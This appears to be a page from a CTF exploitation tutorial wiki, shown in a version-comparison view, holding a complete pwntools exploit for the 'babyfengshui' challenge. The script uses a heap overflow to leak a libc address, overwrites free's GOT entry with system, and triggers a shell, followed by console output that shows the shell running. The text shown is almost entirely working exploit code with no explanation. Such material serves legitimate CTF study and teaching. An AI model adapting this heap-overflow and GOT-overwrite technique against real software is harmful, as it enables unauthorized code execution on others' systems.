Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagepy
titleExploit code
from pwn import *

#context.log_level = 'debug'

def addUser(desc, name, text):
    p.recvuntil('Action: ')
    p.sendline('0')
    p.recvuntil('size of description: ')
    p.sendline(str(desc))
    p.recvuntil('name: ')
    p.sendline(name)
    p.recvuntil('text length: ')
    p.sendline(str(len(text)))
    p.recvuntil('text: ')
    p.sendline(text)

def delUser(idx):
    p.recvuntil('Action: ')
    p.sendline('1')
    p.recvuntil('index: ')
    p.sendline(str(idx))

def displayUser(idx):
    p.recvuntil('Action: ')
    p.sendline('2')
    p.recvuntil('index:')
    p.sendline(str(idx))
    p.recvuntil('description: ')
    addr = p.recvline()
    return addr[:4]

def updateDesc(idx,size,text):
    p.recvuntil('Action: ')
    p.sendline('3')
    p.recvuntil('index: ')
    p.sendline(str(idx))
    p.recvuntil('text length: ')
    p.sendline(str(size))
    p.recvuntil('text: ')
    p.sendline(text)

p = process('./babyfengshui')
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')

#Heap Feng Shui
addUser(10,'A'*10,'B'*10)
addUser(10,'A'*10,'B'*10)
addUser(len('/bin/sh'),'/bin/sh','/bin/sh')

#free()
delUser(0)

#Heap Overflow
addUser(120, 'HeapOverflow', 'A'*152+p32(0x804b010))

#Leak libc address
libcAddr = displayUser(1)

free = u32(libcAddr)
libcBase = free - libc.sym['free']
system = libcBase + libc.sym['system']

log.info('Libc base : '+hex(libcBase))
log.info('free() : '+hex(free))
log.info('system() : '+hex(system))

#Overwrite free.got
updateDesc(1,4,p32(system))

#system('/bin/sh')
delUser(2)

#Get shell
p.interactive()
Code Block
titleGet shell!
lazenca0x0@ubuntu:~/Exploit/HeapFensui$ python exploit.py 
[+] Starting local process './babyfengshui': pid 8750
[*] '/lib/i386-linux-gnu/libc-2.23.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Libc base : 0xf7d48000
[*] free() : 0xf7db8750
[*] system() : 0xf7d82940
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

References

...